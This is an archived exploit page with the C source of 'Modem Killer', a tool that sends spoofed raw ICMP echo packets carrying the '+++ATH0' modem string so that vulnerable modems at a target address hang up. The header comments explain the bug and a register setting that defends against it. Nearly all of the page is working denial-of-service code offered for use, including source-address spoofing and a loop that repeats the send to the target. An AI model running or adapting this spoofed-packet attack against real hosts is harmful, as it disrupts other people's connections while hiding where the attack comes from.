+++ATH0 Attack - This program simply implements a spoofable version of the +++ATH0 modem bug attack. Contains modem patch string too.
d502e71877d0f112231a5674b7cb5d0f144488ae19389137feedf8055d583e8b/* Hi, this is basically a small C program to quickly use the +++AZH0 modem
bug on a given target. This thing is handy because you do not have to go
through the trouble of typing the ping string, and it spoofs, which is also
quite handy :)
Anyway, use this to disconnect most modems on ANY OS on the internet by
sending an ICMP_ECHO_REQUEST with the contents of +++AZH0. The modem gets
it and (since it's an ICMP ECHO) sends the same packet back and resets. It
can be patched by setting the modem register S2 to such a value that turns
the command mode of the modem off (255 will do). The modem
will NOT execute the commands in the packets anymore and function stable.
NOTE: Before you actually USE this program, turn your OWN command mode of
Else, your modem will RESET upon trying to send the packets away.
Put the statement S2=255 somewhere in your modem CALL STRING.
It should look something like this: OK ATB0&C1&D2S2=255DT<Phone No.>
At least, it does so on my modem. Note that some modems will get into trouble
with the command mode turned off. If this is the case, tough, you CANNOT use
this program AND you ARE VULNERABLE to this attack.
This should be it, all you script kiddies, have fun.
Do with this code wathever you want, it's way too simple and lame.
I greet Hester Schadee, Robert Schols, Ed van Dijke for being people I like.
I thank Wietse Venema for writing postFix and for giving a nice lecture at
the SANE 98 Convention.
Have fun,
Scrippie
If you think this program is truly cool (which is not true) mail me at:
ronald.huizer@wxs.nl
If you sincerely wish to flame me, mail me at:
tw374044@student.twi.tudelft.nl
This mailaddress is forwarded to someone I really dislike.
The way to patch a modem has been added thanks to Ardrian Gonzales...
Some modems may disconnect when trying to use the patch.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#define BUFFER 80
#define RESET "+++ATH0\x0d"
#define PATCH "+++ATH0H1TD112\x0d"
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr);
unsigned short in_cksum(u_short *addr, int len);
int killmodem(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, unsigned int type)
{
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
char *blah;
int rc;
int c;
int b=0;
switch(type)
{ case (0): { blah = RESET; break; }
case (1): { blah = PATCH; break; }
default: blah = RESET;
}
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + BUFFER);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
for(c=0;c<(sizeof(struct iphdr)+ sizeof(struct icmphdr) + BUFFER);c++)
{
if(b==strlen(blah)) b=0;
packet[c]=blah[b];
b++;
}
/* This is the IP header of our packet. */
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->id = htons(43210);
ip->frag_off = htons(0);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + BUFFER);
ip->ttl = 25;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = 0;
icmp->checksum = in_cksum((u_short *)icmp,sizeof(struct icmphdr) + BUFFER);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + BUFFER,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char **argv)
{
struct sockaddr_in dest_addr;
unsigned int i,sock,type;
unsigned long src_addr;
if(geteuid()!=0)
{
fprintf(stderr, "You must be ROOT in order to run this!\n");
return(-1);
}
printf("Modem Killer - Version 1.0b - Spoofable\n");
printf("By Scrippie\n");
if ((argc != 5)) {
printf("Use the following format:\n");
printf("%s <Spoof IP> <Target IP> <Number> <Type>\n", argv[0]);
printf("Where type means the type of the modem crash.\n");
printf("---------------------------------------------\n");
printf("Type 0: Makes the modem hangup\n");
printf("Type 1: Patches a modem against attacks\n");
printf("---------------------------------------------\n");
printf("Greetz, Scrippie\n");
return(-1);
}
switch(atoi(argv[4]))
{
case (0): { type = 0; break; }
case (1): { type = 1; break; }
default:{ printf("WRONG type you idiot!\n"); return(-1); }
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf(stderr,"No RAW sockets available...\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("Now sending the modem kill...\n");
for (i = 0;i < atoi(argv[3]);i++)
{
if (killmodem(sock, src_addr, &dest_addr, type) == -1)
{
fprintf(stderr,"Cannot send packet...\n");
return(-1);
}
usleep(10000);
}
}
/*****************************************************************************\
*** Of course, no one has EVER seen this piece of networking code before... ***
\*****************************************************************************/
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr)
{
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed